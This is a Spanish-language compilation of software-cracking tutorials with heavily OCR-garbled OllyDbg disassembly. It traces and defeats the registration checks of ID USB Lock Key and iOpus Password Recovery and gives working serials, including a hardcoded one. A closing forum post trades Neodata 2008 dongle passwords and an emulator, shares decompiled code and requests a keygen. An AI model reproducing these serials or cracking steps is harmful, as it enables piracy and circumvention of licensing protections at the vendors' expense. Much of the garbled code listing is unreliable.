Por lo que analizo el código (Ctrl.+A) y empiezo por buscar en las String Referentes el 
mensajito tan agradable: “Incorrect Registration Code!”. 


Lepta o ASCII" 


ba456B57 MOU ES, Rin: ¿osgerzs ASCII sad registersd, Please restart the apolication in order tl 
BO456BAF PUSH Adnin.20496CA RECII " 
Ba456BCF MOU ER, Adm ASCII <mIncorcect Reglstrat ion Codet” 


ima Secos E 
B2496C24 ASCII "Successful ly res” 
0u456034 ASCII "isteced. Please ” 


Y miren quien decidió dar la cara, los dos hermanos, “Bad/Good Boy”...jeje. Hacemos 
doble clic en “Incorrect Registration Code!” y caemos aquí. 


ES 3IDEFFFF 


t 


A 
BS 246049008 |MOU EAX,Adnin.90049EC2 ASCII "Successfully registered. Please re 
ES 1763F9FF 


PUSH ó 


PUSH_0 
2055 EC ES EDX,DWORD PTR SS: [EBP-14] 
A1 Fa944900 Y EA, D PTR DS: ee 


3609 

ES BABFFOFF 

ES 46ESFEFF |£ Fl 

58 PUSH ER 

63 34604908 ASCII "open" 
ES FD?1FSFF 

56 


ES IBSOF9FF 
Al FO944900 - RD PT 
ES EFOSFOFF |£AL S | 


< 


(AA UE ara 
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Vaya, ya esto va cogiendo forma, al menos eso parece. Unas líneas arriba tenemos el 
cartel de felicitación y justo encima una clásica estructura. 


-CALL 
-CMP/TEST 
-JNZ (Salto chico bueno/chico malo) 


Además si subimos un poco mas arriba veremos el PUSH EBP que me indica el 
principio de una función, en este caso el evento clic del botón Register. Sin dudarlo ni 
un momento me adelanto a poner un BP en el CALL en 00496B7E, quito el Memory 
BP y corro una vez más la aplicación. Le introduzco mis datos nuevamente y doy clic 
en el botón Register. Olly se detiene en mi BP. 


00496B76]] . 3309 KOR ECX, ECX 
0479678 A mo AX, DUORD PTR DOS: [EBX+318] 
61 
v 43 : 
2 ASCII "Successful ly registered. Please yr 


MOV ERX, Admin 10436! 


.. +. . . . . dr 


2325D BC mou DWORD PTR SS: [EBP-44],EBx 


En otra función, vaya esto se esta poniendo bueno. Traceo unas líneas mas abajo y 
exactamente a partir de 00494A 14 hay algo que me llama la atención. 


683 DBB7OBBB | PUSI y E 

ES 6295F7?FF Sleep 
2B43 54 AX, DIO! 

s07ra 04 bu 

74 BA 

8D55 FC L R : [EBP-4] 


2BC3 MOV EAX 

ES SBFAFFFF 

ES B625F7FF CiGetTickCount 
31C6 CFO74B01 ADD ESI,7CF 

3BC6 JE HOR Ad 


A 
Es un SLEEP puesto a 2s (por eso se demoraba un poco para darme respuesta cuando 
introducía un serial) y mas abajo, en 00494A3E, un salto que va a hacer que se repita 
este ciclo de forma infinita. Si traceamos hasta allí 500 veces, veremos que las 500 
veces volverá a Nisecdii No se si esto será algún truco antidebuging o algo 
( Her sherños! trabajo quie hacer, por lo que no nos 

1 St ántorareñosel flan de acárre orto LEBANAriE COMA ero 

dy AUR SHRGO SESIANGS milestro camino y vemos en 00494A43 


cae ans aañes COMPARA LENCNAME) CON 5 
A - PMI TR SS: PFRP+F1 
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A su vez verifica que no sea mayor que 50 (decimal) y que no sea menor que 5, de ser 
así saltaría al chico malo. Nosotros no tenemos problemas con eso, nuestro 


00494AAB| . 8D45 FO E EAX, DWORD PTR SS: CEBP-19] 

00494ARE| . 8B55 BC. MOU_EDX, DWORD PTR SS: [EBP+C] 
A 5) EEE E DL. ] S: CEDX+13 

au4944B4| . ES 630BF7FF. E 

00494AB9| . 8D4S5 DS S: [EBP-28] 

00494ABC| . 8B55 BC ou EDX, DUORD PTR_SS: [EBP+C] 

ARAIAARF BAR? A9 HAU NI.AYTE PTR Ns: FFNX+91 


len(name)= =7, Seguimos y verifica que el serial no este vacío, caso contrario se acaba la 
fiesta. Por varias líneas más se hacen otras comprobaciones del nombre y demás, hasta 
que llegamos aquí. 


O0AI4ARE] . 8BS5 6C MOU EDIX, DWORD _PTR SS: [EBP+CJ 

DO494AB1]| . 5i ¿(E0X+1] SEGUNDO CARACTER 
004949564] . ES 6300F?FF 

DO4F4AES| . D8 EBP-28] 

Du494ABEC| . 8B55 BC MOU EDX, DWORD_PTR SS: LEBpeeS 

DO494ABF| . 8A52 M9 MOV OL,BYTE PTR DS:LEDx+9] DECIMO CARACTER 
20494AC2| . 8858 01 mou Byte PTR 0S: [EAX+13, OL 

BOs94Ac5| . C690 01 MOU BYTE PTR DS: [EAXJ, 1 

00494903] . 8D55 D8 LEA EDXx, DWORD PTR SS: [EBP-28] 

00494AC5| - D4 + CEBP-2C1 

DO494ACE| . ES GIESFGFF 

DOA94aD3| . DG : CEBP-230] 

B04949D6| . 8B55 BC Mod EDX, DWORD PTR SS: LEBP+C) 

200494AD9| . 8AS2 O? nou OL, BYTE PTR DS: [EDX+73 OCTAVO CARACTER 
0u494ADC| . 88508 01 mou PTR DS: [ERX+1 7, DL 

DO4940DF| . MOV BYTE PTR DS: [EAXJ,1 

00494AE2| . 8D55 DO LEA EDX, DWORD PTR SS: LEBP-30] 

A0494MES| . 8D45 D4 LEA EAX, DWORD PTR SS: [EBP-2C] 

004940E3| . 81 B2 

00494AREA| . ES 1SESF6FF 

DO0494REF| , 2D5S5 D4 L . R $$: [EBP-20C] 

0B494AF2| . 8D45 EC : [EBP-14] 

00494AFS| . ES SEBOF?FF 

ROFI4AFA| . Ss D8 , D PTR SS: (EBP-28] 

204949FD| . 8B55 BC MOU EDX, DWORD_PTR_SS: LEBP+C3 

B0494509/| . 8AS2 83 MOV OL,BYTE PTR DS: LEDX+3) CUARTO CARACTER 
p0494B03| . 885609 01 MOU BYTE PTR DS: [ERX+13, DL 

B0494B05| . C600 41 MOU BYTE PTR DS: [EAXJ, 1 

B0494809| . 8D5S DS LEA EDXx, DWORD PTR SS: LEBP-28] 

B0494BBC| . 8D4S D4 R_SS: LEBP-2C] 

0u494B0F| . ES 20E8F6FF 

06494514] . 8D45 DB LU , : [EBP-2307 

20494817] . 8BSS BC MOU EDX, DWORD PTR SS: LEBP+C2 

00494819] . 8AS2 05 MOU DL,BYTE PTR DS: [EDX+*5] SEXTO CARACTER 
aus94B10/ . 8950 01 MOV BYTE PTR DS: [ERX+1 3, DL 

DO493B20| . MOV BYTE PTR DS: [EAXI, 1 

0049423] . 8D5S DO LEA EDXx, DWORD PTR SS: [EBP-30] 

DO494B26| , LEA EAX, DWORD PTR SS: [EBP-2C] 

DuI9IBZA| . 

00494B28| . ES DIE?FGFF 

00494830] , Ds , + [EBP-2C 

BB49IBI3| cc : [EBP-34] 

00494836] . ES FIE?FGFF 

00494B28| , 45 DO LEA EAX, DWORD PTR SS: [EBP-20] 

00494B3E| . 8B55 6C MOU EOX, DIWJORD_PTR SS: [EBP+CJ 

004945841] . 8AS2 OB MOU DL,BYTE PTR DS: LEDX+B] DOCE CARACTER 
00494B44| . 88508 01 MOU BYTE PTR DS: [ERX+17, DL 


En estas líneas de código se toman varios caracteres del serial ingresado 
Después hace lo siguiente: 
-EAX=cuarto_caract+sexto_caract+tduodecimo_caract 
-ESI=segundo_caract 


-EDI+decimo_caract+octavo_caract 


Y les realiza las siguientes operaciones: 


00494BBD . 8BD7 MOV EDX,EDI 

00494BBF . OBD6 OR EDX,ESI 

00494BC1 . OBDO OR EDX,EAX 

00494BC3 . 81FA FFFF0000  CMP EDX,OFFFF 

00494BC9 ./75 0F JNZ SHORT Admin.00494BDA 


Por lo que, si después de realizarle estas operaciones al serial, el resultado es igual a 
OFFFE, iremos reportados, por lo que nos conviene que así no sea. En mi caso no hay 
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problemas por lo que continuo con el código. Mas abajo vienen unas cuantas 
operaciones con los registros FPU(los odio), y cada vez que pasaba por allí me generaba 
excepciones y me tiraba al cartel malo. Como les dije soy un newbie, además de odiar 
las operaciones flotantes con los FPU no las entiendo muy bien, por lo que, después de 
un poco de prueba-error y cambiando los caracteres del serial que se utilizaban para 
dichas operaciones, logre pasar estas comprobaciones (disculpen la chapucería), ahora 
el serial tenia esta forma: 


EDCAAAB3A4AAA567 


Bueno, al final llegue a esta localización. 


B0494CaS 


00434045 
0049464A 


00494040 
4052 


8EC3 
ES 2EF4FFFF 
8B45 BC 

BA 18404900 


ASCII "64536463136542311 


ES 613FF?FF 
3500 


00494057 
a E 75 06 

C645 F7? 61 
RS 


Donde pasa a ECX mi serial y a EDX mi nombre, algo me huele extraño, mejor entro en 
el CALL con F7 a ver que se trae. Traceo unas líneas y llego a. 


00494981 682 10444900 
64 12] 


EU Ognio: 099231 c 
H_ DWORD P 


00494066|| : 64:FF3 TR_FS: LEAXI 
e2494989||. 64:8928 04 DBORD PTA ES: TEAX], ESP 
eñ49408c ||. 8845 68 HOY, Ef, DWORD PTA 35: (ÉBP+8] 
: 34 WU EDX, Admin. 00494434 ASCII "S42264156124568746122" 
ep4949ca||. ES BFOSF?FF 
eoyóq0co ||: 8848 F8 MOV EAX, DVORD PTR_SS: [EBP-8] 
es4549cc||: ES 230BF?FF , 
60454901/|. $888 FC R SS1 LEBP-4] 
e2424804|| : 3842 58 R DS: (EDX+58) COMPARA LENCNAME) CON SO 
60454007 || :- OFSF 17030 
6249409001): 8645 FS S: CEBP-8] 
op494080|| : ES BFOBF7FF Admin. 
004940E5|| - 8855 FC , DUORD PTR SS: CEBP-4] 
0n4949€3|| . 3842 5C DS: LEDX+5C] COMPARA LEN(NAME) CON 5 
604940€B || :v OFSC eseso 
ARASAAF1IE.  —AN4S FA ás SS: 1FRP-241 


Donde copia junto a mi serial esta cadena y vuelve a realizar comprobaciones del 
nombre de usuario. Al pasarlas todas caemos aquí, donde vuelve a tomar caracteres del 
serial para realizar comprobaciones. 


004940F4]] . 8BSS F4 EDX, DWORD SS: [EBP-C] 

004940F7|| . 8A12 MOU DL,BYTE PTR DS: [EDXJ PRIMER CARACTER 
p04940F9|]. S8568 61 BYTE PTR DS: [EAX+1], DL 

004940FC|].. C606B 01 MOU BYTE PTR DS: [ERXJ, 

B049450FF |]. 8D5S ES LEA EDX, DWORD PTR SS: [EBP-28] 

Ba494162|] . 8D4S5 DC PTR SS: [EBP-24] 

604941051]. ES 2AF2F6FF 

60494164A|]. 8D45 DS . : [EBP-28] 

60494100/|. SBSS F4 MOU EDX, DWORD _PTR SS: £ 

00494110]. 8AS52 62 MOU DL,BYTE PTR DS: [EDX+2] TERCER CARACTER 
Bo494113|]. Sesa el MOU BYTE PTR DS: (EA%+1], DL 

0n494116/]. C6BaB Bi MOU BYTE PTR DS: (ERXJ, 1 

6494119]. S8DS5 DS LEA EDX, DWORD PTR SS: [EBP-28] 

0u49411C|].. 8D45 DC LEA EAX, DWORD PTR SS: [EBP-24] 

6049411F 1]. 1 02 

6B494121/]. ES DEFIFGFF 

60494126|| . 8D55 DC LEA EDX, DWORD PTR SS: [EBP-24] 

00494129/|. 45 FO TR _SS: [EBP-10] 

Ba49412C |]. ES E67BAF?FF 

04941311]. D4S EC , : CEBP-14] 

00494134|] . 8B5S F4 MOU EDX, DWORD _PTR SS: [EBP 

9u494137 |]. 8AS2 04 P 3 +4] QUINTO CARACTER 
00494139|].. ES DDBSF?FF 

au49413F|]. 8B45 FS : [EBP-8] 

004941421]. ES ADBAF?FF 


Toma el primer caracter y lo une al tercero, comprueba que no sea igual a OFFFF y que 
sean igual a 29. Como no es nuestro caso corremos con F9, aceptamos nuestro error, 
cambiamos el serial y ponemos como primer carácter el 2 y como tercero el 9 
2D9AAAZAJAAA567 
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Lo volvemos a intentar y vemos que ahora si podemos continuar. Comprueba que el 
quinto carácter no sea igual a OFFFF y además que este entre el tamaño del nombre y 
16, en nuestro caso es A, por lo que pasamos sin problemas. Ahora vuelve a tomar 


caracteres del serial. 


DODODODAA 


DODODADADO 


ODO 


45 D4 
ES DAFBFEFF 
Ds 


ss 
00 Mm co co m0 0 00 mos 
ONO . ONO 
«nm 
an 
mn 
H 


OOCÍAa fat 


LEA EAX, DWORD PTR SS: CEBP-20] 

MOU EDX, DWORD_PTR_SS: [EBP-C] 

MOU DL,BYTE PTR DS: [EDX+6] 

MOU BYTE PTR DS: CEAX+1],DL 

MOU BYTE PTR DS: [EAXJI,1 

LEA EDxX, DWORD PTR SS: [EBP-20] 
S: [EBP-24] 


LEA EAX, DWORD PTR SS: CEBP-28] 
MOU EDX, DWORD_PTR_SS: [EBP-C] 
MOU DL,BYTE PTR DS: [EDX+8] 
MOU BYTE PTR DS: [EAX+1], DL 
MOU BYTE PTR DS: [EAXJI,1 

LEA EDxX,DWORD PTR SS: [EBP-28] 
LEA EAX, DWORD PTR SS: [EBP-24] 


2 MOU CL, 2 
A ora 
DSS DC L »D S: [EBP-24] 


S: [EBP-2C] 


LEA EAX, DWORD PTR SS: [EBP-28] 
MOU EDX, DWORD_PTR_SS: [EBP-C] 
MOU DL,BYTE PTR DS: [EDX+AJ 


MM DUTE DTD Mos TEenvaiti1 mi 


SEPTIMO CARACTER 


NOVENO CARACTER 


ONCENO CARACTER 


Compara que septimo_caracttnoveno_caract+onceno_caract sea diferente de OFFFF y 


que sean igual al resultado de unas operaciones que realiza con el nombre. Por lo que 
necesitamos volver a cambiar nuestro serial por: 


2D9AAADAZADAS67 


Lo cambiamos y pasamos esta verificación también. Ahora verifica que la longitud del 
serial sea mayor que doce. La pasamos también. Seguimos en el traceo y llegamos a un 
bucle, dicho bucle se repite unas 33 veces y lo que hace es crear pequeñas cadenas de 3 
valores. 


3B45 FC 
Ese 78 


8B 
25 FFOFOBOO 
BA 03090900 
ES AB4DF?FF 
SB55 C4 
3D45 EC 
ES 4508F7FF 
4F 

43 
-|83FB 21 
75 AS 
2D45 EC 


MOU ECX,EBX 

MOU EAX, DWORD PTR SS: CEBP-4] 

MOU EAX, DWORD PTR DS: [EAX+78] 
U ESI,EAX 


MOU ECx,EDI 
SHR_EAX, CL 
OR ESI,EAX 
MOU EAX,ESI 
CDa 


XOR EAX, EDX 
SUB EAX, EDX 
MOU ESI,ERX 


ral 


P-1C] 
, 


CDQ 
10 DWORD PTR SS: [EBP-1C] 


, ¡ [EBP-10] 


ESI,EDX 
LEA ECX,DUORD PTR SS: LEBP-301 
AND EAX, OFFF 


S: [EBP-30] 
TR_SS: [EBP-14] 


Para terminar rápido con esto ponemos un BP en la primera instrucción fuera del bucle 
y hacemos F9 para salir del mismo y caemos en 004943BE. Traceamos unas líneas 


abajo y veremos la enorme STRING que se ha creado, después de esto, en la dir 
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004943D8 se pasan los primeros ocho caracteres de dicha STRING a EDX y los últimos 
tres caracteres de nuestro serial a EAX. 


POTRO 


Dt AS 
8B55 EC MOU EDxX, DWORD PTR SS: CEBP-14] 


8B4s FO 0U EAX, DWORD PTR_SS: [EBP-10] 
ES 2548F7FF 

7] 

¡4 Bose 


Luego se entra al CALL siguiente y se compara que sean iguales, por lo que debemos 
cambiar nuestro serial para que quede como sigue: 


2D9AAAVA3ADAD8CB188C 


Lo cambiamos y veremos que pasamos esta comprobación también. Si seguimos 
traceando veremos que en 004943EA se pasa otra STRING a EDX. 


1049430E 
064943E3 
104943ES 
0B4943E7? 


. ES ÓS FEF 


de den guie A 
. BA 64444900 i 4464 ASCII "645364631265423154824" 
da CELL aga ODAOASOS 


Traceamos hasta el RET y cuando salimos del CALL veremos que mueve a EAX dicha 
STRING y que a EDX mueve una copia de ella misma, una línea mas abajo, en el 
CALL, las compara. 


10494043] . 8SBC3 

E]. 6B45 BC DWORD PTR_SS: LEBP=44] 
694941 . Ú y | . 00494018 
20494152! . 
B Sl. 


UB43943EF 
104943 F4 


BA 18404908 ASCII "645364631365423154824” 


ES 613FF7FF 


zed 
: ES B1 |MOU BYTE _PTR SS: [EBP-9],1 
> C645 F7 Bb > ¿ ; 8 
» > 887D_F7? B1 3 1 
D0494C69| .v 75 37 
00494068 £D43 50 » ; +50] 
AGADACEO OoDcre Er Mt CP Mino DTD SC. PFEDDLAT 


Si son iguales no coge los saltos en 00494C59 y 00494C69, por lo tanto continúa 
ejecutando código hasta llegar al CALL en 00494C99. Si entramos dentro, veremos 
como escribe valores al registro de windows y vuelve a realizar todas las 
comprobaciones del principio 


8B45 FC 1 [EBP-4] 
ES 4SE1FS9FF 

68 _D0514900 
FF73 64 

68 E0514900 
3085 6CFDFF 


ASCII "sCLSID»” 
ASCII "Info" 


¡ánin. 
PUSH DWORD PTR_DS: [EBX+64] 
PUSH _Adnin.004951 
LEA EAX, DWORD PTR SS: [EBP-294] 
1 [EBP-2941 


PTR_SS: [EBP-4] 


£ 


: CEBP-43 
ES O9E1F9FF 


68 F6514990 in. B ASCII "Software vCLASSESACLSID” 
PUSH DWORD PTR DS: [EBX+64] 


FF73 64 

68 E6S14990 | PUSH _Adnin.BB4951EB ASCII "sx Info" 
38085 SSFOFFFÍ LEA EAX, DWORD PTR SS: [EBP-2987 

2%, DWORD P : [EBP-298] 
: CTEBP-43 


..o..... +... . qye... ......... 


Parece que quiere estar seguro de algo, querrá decir esto que lo hicimos?. Bueno, para 
asegurarnos salgamos de dicho CALL con Ctrl+F9, hasta llegar a la función principal, 
específicamente a 00496B83. 
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ROS: [EEXM+3187 


4 . 
MOV EAX, Adria. D04PECZ4 ASCII "Successfully registered. Please restart 


Como vemos no tomara el salto al mensaje de error, lo que significa que.... 
ESTAMOS REGISTRADOS!!!! ;-) 


ID USB Lock Key 


Successfully registered. Please restart the application in order the changes to take 
effect, 


Cog ] 


O sea que nuestros datos finales serian 


Name: Thunder 
Serial: 2D9AAA0A3JADAD8CB188C 


Parece que lo hicimos, cerramos el Olly, ejecutamos la aplicación y 


Veremos que no nos sale más la opción REGISTER, aunque en el ABOUT no sale 
ninguna info del registro, bueno...como sea...LO HICIMOS!!! Ah, una pequeña 
curiosidad. Todos los demás productos de ID Security Suite, tienen la misma rutina de 
registro, lo único que cambia en el serial son especificamente los bytes que vimos aquí. 


--->>>MISSION ENDING... 


Bueno, hasta aquí este tutorial. Como les había dicho al principio, discúlpenme los 
errores que pueda haber tenido, soy un chapucero sin remedio... ;-D. Aunque sus 
consejos y críticas serán bien recibidos en yuniet02015(dMhab.jovenclub.cu, pásate por 
allí y deja tus sugerencias. Agradecimientos a todos los crackers del mundo que se 
dedican a escribir tutos y a compartir lo que saben de este hermoso arte, desde Ratón, 
Diablo Poeta, Guillermo, SACCOPHARYNX, Joe Cracker, Destripador « 
Marmota, COCO, MAKKAKO, Lisa Alquimista, y muchos mas de los que 
escriben teorías, he leido y he aprendido lo que se. Por supuesto, al maestro Ricardo 
Narvaja, gracias por tu ayuda desinteresada y por tu tiempo con este newbie y con 
todos los que lo necesitan. Muchísimas gracias a la web www.crackmes.de y a la gente 
de http: //elhacker.net por tener ese espacio de Ingeniería Inversa y por estar dispuestos 
a ayudar siempre...esos muchachos están escapaos...jeje. Un saludo a todos los crackers 
alrededor del mundo. Y este es el fin...nos vemos en otro...quizás...quien sabe. 


THE TRUTH IS OUT THERE 


THUNDER 


SEEK IT 


¡Opus Password Recovery v4.02 
Introduccion: 


This new version the popular ¡Opus Password Recovery software allows users to decrypt and display passwords 
stored behind the asterisks on Windows XP systems (as well as all other Windows versions). 


¡Opus Password Recovery XP is the first tool of its kind that works automatically on Web pages, Windows 9x/NT 
and Windows 2000/XP systems. 


Web: http://www.i¡opus.com/ 


Dificultad: 
Es mas difícil descomprimir el fichero a mano que encontrarle el serial. 


Herramientas: 


OllyDbg v1.09b 
Armadillodumper para WinXP (En el FTP de Ricadro creo que esta) 


Al Ataque: 


Si miramos el programa con el Pldentifier nos dice que esta comprimido con armadillo, (Armadillo 2.53 -> Silicon 
Realms Toolworks), podría descomprimir el ejecutable a mano con los tutes de Ricardo sobre armadillo o hacerlo a 
máquina, esta vez como no tengo tiempo lo haré a máquina. 

Una vez descomprimido el ejecutable lo paso al Olly y hago Search for all referenced strings y busco la cadena: 
"The software is now activated. Thank you for using ¡Opus Software., esto se encuentra en el siguiente bloque de 
codigo: 


00401851 E8AA650000 CALL Dumped.00407E00 ¡Rutina comparación del serial. 
00401856 84C0 TEST AL,AL 

00401858 6A 44 PUSH 44 

0040185A B9E0E34300 MOV ECX,Dumped.0043E3E0 

0040185F 0F84 B0000000 JE Dumped.00401915 ; Si AL=0 a tomar viento. 
00401865 6E806040000 CALL Dumped.00401C70 

0040186A 50 PUSH EAX 

0040186B 51 PUSH ECX 

0040186C  8BCC MOV ECX,ESP 

0040186E 896424 1C MOV DWORD PTR SS:[ESP+1C],ESP 

00401872 68 8C824300 PUSH Dumped.0043828C ; ASCII "The software is now activated. 
Thank you for using ¡Opus Software. 


Dentro del call 00401851 se encuentra la validación de nuestro serial y en 0040185F el salto que nos mandara al 
foso de los leones o a la victoria, con estos datos ya es hora de arrancar el programa, pongo un BPX en 00401851 
y ejecuto el programa. 


Al ponerle un numero de serie chungo y pulsarle el botón de Click to activate, Olly rompe en 
00401851, si entramos dentro del call: 


00407E00 64:A1 00000000 MOV EAX,DWORD PTR FS:[0] 
00407E06 6AFF PUSH -1 

00407E08 68 98B24200 PUSH Dumped.0042B298 
00407E0D 50 PUSH EAX 


00407E0E A1 D4E34300 MOV EAX,DWORD PTR DS:[43E3D4] 
00407E13  64:8925 0000000>MOV DWORD PTR FS:[0],ESP 
00407E1A 83EC 08 SUB ESP,8 


00407E1D 53 PUSH EBX 

00407E1E 56 PUSH ESI 

00407E1F BE E48E4300 MOV ESI,Dumped.00438EE4 ; ASCII "RE6521387527889" 
00407E24 8A10 MOV DL,BYTE PTR DS:[EAX] 

00407E26 8A1E MOV BL,BYTE PTR DS:[ESI] 

00407E28 8ACA MOV CL,DL 

00407E2A 3AD3 CMP DL,BL 

00407E2C  751E JNZ SHORT Dumped.00407E4C 

00407E2E 84C9 TEST CL,CL 

00407E30 7416 JE SHORT Dumped.00407E48 


00407E32 8A50 01 MOV DL,BYTE PTR DS:[EAX+1] 
00407E35 8A5E 01 MOV BL,BYTE PTR DS:[ESI+1] 


00407E38 8ACA MOV CL,DL 
00407E3A 3AD3 CMP DL,BL 
00407E3C  750E JNZ SHORT Dumped.00407E4C 


00407E3E 83C0 02 ADD EAX,2 
00407E41 83C6 02 ADD ESI,2 


00407E44 84C9 TEST CL,CL 

00407E46 * 75DGC JNZ SHORT Dumped.00407E24 
00407E48 33C0 XOR EAX,EAX 

00407E4A EB 05 JMP SHORT Dumped.00407E51 


En 00407E1F podemos ver un numero algo extraño, será un numero de serie”, si lo probamos el programa nos 
mostrará una ventana diciendo que el numero de serie introducido no es correcto ya que este numero es mas falso 
que judas. 

Para que utilizará entonces el programa este numero tan raro?, pues sencillamente para compararlo con el que 
nosotros le introduzcamos. 


Avanzando dentro del call encontramos la primera comparación de bytes: 


00407E24 8A10 MOV DL,BYTE PTR DS:[EAX] 
00407E26 8A1E MOV BL,BYTE PTR DS;:[ESI] 
00407E28 8ACA MOV CL,DL 

00407E2A 3AD3 CMP DL,BL 

00407E2C /751E JNZ SHORT Dumped.00407E4C 


En 00407E2A compara nuestro primer carácter chungo que se encuentra en DL con el primer carácter del serial 
correcto que se encuentra en BL. 


Si continuamos en: 


00407E32 8A50 01 MOV DL,BYTE PTR DS:[EAX+1] 
00407E35 8A5E 01 MOV BL,BYTE PTR DS:[ESI+1] 


00407E38 8ACA MOV CL,DL 
00407E3A 3AD3 CMP DL,BL 
00407E3C  750E JNZ SHORT Dumped.00407E4C 


Ahora aquí nuevamente en 00407E3A hay otra comparación de los seriales, en DL tenemos el segundo carácter de 
nuestro serial malo y en BL el segundo del serial correcto. 


Siguiendo dentro del mismo call llegaremos a: 


00407ED3 8A10 MOV DL,BYTE PTR DS:[EAX] 
00407ED5 8A1E MOV BL,BYTE PTR DS;:[ESI] 
00407ED7 8ACA MOV CL,DL 

00407ED9 3AD3 CMP DL,BL 

00407EDB 751E JNZ SHORT Dumped.00407EFB 


Esta es la última comprobación de los seriales, en 00407ED9 compara el carácter cuarto de nuestro serial falso que 
se almacena en DL con el verdadero que se encuentra en BL. 


Si continuamos vemos que el programa ya no testea los demás caracteres de nuestro serial y acepta todos los que 
le hemos puesto como buenos. 


Por lo tanto los únicos números que el programa testea son el primer, segundo y cuarto carácteres de nuestro 
serial, los demás le son indiferentes, tanto si hay mas como si hay menos. 


En este programa el programador no se ha calentado mucho la cabeza a la hora de realizar la rutina del calculo del 
serial y ha decidido que la mejor opción es protegerlo con Armadillo para que no se lo puedan crackerar, craso 
error ya que habrá tenido que pagar por adquirir la licencia del Armadillo, salvo que lo haya comprado en 
Astalavista claro y al final ha caído. XDDDDDDD. 


Notas Finales: 

Este tute ha sido realizado con fines puramente didácticos, por lo tango yo no me hago responsable del mal uso 
que se pueda hacer de esta información. 

Si alguien esta interesado en el programa que lo compre ya que de esta forma motivaremos a los programadores a 
que sigan creando nuevos programas share y así nosotros podremos seguir con nuestra adicción preferida. 


Bueno espero que mi primer tute haya sido comprendido por el personal y que haya sido de provecho para alguien, 
con eso ya me conformo. 


Salu2 de Dunji123. 


Crackera Neodata 2008 By Obama 
Antecentes del programa 


Varios Autores 


NEODATA 2008 - Un ejemplo en protecciones chafas. 


Pues resulta que desde el post del neodata 2003-2006 que me gano el X-supreme al resolver mi 
post de Ladron que roba a ladron, me quede con la espinita de que si el emulador funcionaba para 
las versiones 2003-2004-2006 (el 2004 no lo probe pero me entere que si jalaba) tambien lo 
podria hacer para el 2007 y 2008 y pues apenas lo comprobe. Un compa miembro de este H. Foro 
me rolo unos dumps de un Neodata 2006 y otro del 2008 pero no apunto las claves para entrar al 
programa asi que nos pusimos manos a la obra y sacamos las respectivas claves pero de una vez 
hice la prueba y efectivamente acontecio asi, la del 2006 tambien jalaba en el 2008 y viceversa. 
=) (algo que tambien pasa con el opus desde la 99, 2000, ole , ole2 y aec10, pero un poco mas 
complicado puesto que son varias claves y estas se guardan en el candado) bueno entonces y 
como saque las dichosas claves, pues para el Neodata 2006 fue regalado, ni se puede llamar 
crackear, pues simplemente como es un programa en Visualbasic, utilize el Smartshit, digo , 
smartcheck para ver que hacia en el momento que me pedia la clave, y asi tal cual encontre la 
clave en forma de texto puro, lo cual no me paso con el 2007 y el 2008, supongo que le agregaron 
alguna rutina antidebugger o algo asi, pero luego utilice el olly con el 2008 y pues utilizando las 
tecnicas de crackeo basicas, poniendo un breakpoint y traceando un poco di con la clave. El caso 
que nos ocupa es que no he podido sacar la clave para el 2007 y no entiendo porque, (sera que 
estoy muy wey) pero bueno, como aqui en el foro tenemos en el post del NEodata 2006 un 
emulador hecho por un OGT roba cracks, intente dumpear el contenido de su emulador y me tope 
con la sorpresa de que simplemente NO PUEDO, pero sé especificamente el porque, puesto que su 
servicio EMUND emula un candado de RED, y el protocolo que utiliza para leer el candado es el 
UDP (cosa extraña puesto que el servidor para candados de red de sentinel por default utiliza el 
protocolo TCP) en el puerto 6001, y como no existen dumpers para sentinel que lean desde ese 
protocolo no tengo una manera directa de dumpearlo, ni siquiera de monitorearlo con el TORO 
sentinel monitor puesto que este checa los puertos USB, asi que aunque se que existen monitores 
de Red que me puedan dar la info que manda el emulador al candado, no se me ocurre como 
crear el dump. Tambien intente dar de alta el servicio del sentinel protection server pero al estar 
ocupado el puerto 6001, no me deja iniciar el servicio. 


Entonces que nos queda de este post: 

1.- Saber que solamente necesitamos un dump de cualquier version del neodata y con ese 
podemos sacar la clave para el mas actualizado. 

2.- Saber que el emulador posteado aqui para el neodata 2006 no es inservible para ponerlo en 
una version posterior a menos que podamos extraer el dump del mismo y/ o conseguir las 
versiones en red del Neodata 2008 que no estan puestas en el sitio web. 


Que es lo que pido: 

1.- Si alguien puede extraer el dump del emulador del SerialCode9x. 

2.- Si alguien tiene alguna forma de monitorear el emulador por el puerto udp 6001. 

3.- Si alguien tiene la version para RED del neodata 2008. 

4.- Si alguien tiene alguna idea para lograr mi cometido. 

5.- Si alguien podria hacer un keygen para cada version del neodata. Ya que la info la saca 
del candado y solamente son 2 cosas, numero de serie de candado y nombre de quien esta 
registrado, todo eso y una leyenda que dice 

"usumacintaXXXXXVERSI 0ON200YZZZZZNOMBRE DE LA EMPRESA REGISTRADA" 

donde XXXXX es un valor del candado 

donde Y es el año de la version del programa 

donde ZZZZZ es el numero de serie del candado en formato decimal 


y con todo eso crea un serial de entre 6 y 11 caracteres. 


Bueno pues ya me extendi como siempre.... 


Ya supe porque fregados no puedo con el neodata 2007 pues resulta que implementaron un 
proteccion a la clave por medio de un encryptador (vease http:/ / www.ebcrypt.com/, es gratis y 
trae ejemplos de lo que hace) y todavia no le hallo la pass que utilizaron para encryptar y 
desencriptar, pero espero al rato salga. 


esto es lo que hace el dichoso encryptador 
Currently supported features are: 


Symmetrical encryption algorithms: IDEA, BLOWFISH, CAST5, DES, 3DES, RIJNDAEL, SERPENT, 
TWOFI SH 

Hashing algorithms: MD5, RIPEMD160, SHA1 

Diffie-Hellman key exchange protocol; 

DSA public/ private key support, including key generation, export/ import and digital signatured; 
RSA public/ private key support, including key generation, export/ import and digital signatured; 
X.509 Public key certificate support; 

Other: high level functions provided to do one function call file encryption/ decryption, conversion 
to hex and base64 strings. 

ebCrypt is developed by EB Design Pty Ltd, see contact details further down. 


tambien se me ocurrio modificar este encryptador para que solamente entrara y retornara sin 
mover ningun valor pero me chafeo medio feo la aplicacion, otra cosa que tambien hice fue 
descompilar el programa como esta hecho en visual basic pues lo meti a descompilar y el cabron 
tardo todo el dia, asi que mejor les posteo un archivo con todos los modulos descompilados a ver 
si hay alguien muy pirinola en Visual Basic que pueda sacar el keygen con eso, 


http:/ / rapidshare.com/ files/ 139307633/ decompiled.rar.html 


Dices que el emulador posteado aquí del Neodata sirve para el 2004 y el 2006, yo lo probé hace 
algún tiempo en el Neodata 2004 y 2006 y si funcionó pero después de 15 conceptos en la hoja 
de presupuesto se traba ¿ya checaste si eso pasa con las demás versiones? por que 
aparentemente funciona bien pero al momento de estar ya trabajando en el Neodata se traba. En 
el Neodata 2008 no lo probé bien, dime como le hiciste ¿funciona bien? checa este emulador 


